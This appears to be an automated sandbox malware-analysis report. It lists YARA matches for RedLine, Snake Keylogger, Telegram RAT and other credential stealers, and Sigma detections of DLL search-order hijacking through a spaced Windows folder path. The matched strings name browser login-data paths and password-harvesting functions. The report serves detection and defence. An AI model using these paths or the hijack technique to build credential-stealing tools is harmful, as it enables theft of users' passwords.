10.2.fpnevlzQ.pif.1f5402c6.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f5402c6.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
13.1.fpnevlzQ.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.4dc8c8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.2de602c6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
13.2.fpnevlzQ.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.30630000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30630000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30630000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30630000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30630000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30630000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
0.2.PWSW6GK3ZC.exe.211aa5b8.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21e90000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.21f70000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f830f20.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
7.2.fpnevlzQ.pif.30630f20.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30630f20.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30630f20.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
10.2.fpnevlzQ.pif.1f830f20.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30630000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
10.2.fpnevlzQ.pif.21f70000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.21f70000.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.21f70000.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f830f20.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.21f70000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f830f20.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
10.2.fpnevlzQ.pif.21f70000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.21f70000.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
13.2.fpnevlzQ.pif.21740f20.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21740f20.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21740f20.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21740f20.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.21740f20.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21740f20.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
13.3.fpnevlzQ.pif.1d29f158.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
0.2.PWSW6GK3ZC.exe.28a0000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.1eeb11e6.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30cc0000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
13.2.fpnevlzQ.pif.21e90000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21e90000.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.21e90000.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21740f20.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
Click to see the 228 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\PWSW6GK3ZC.exe, ProcessId: 5852, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

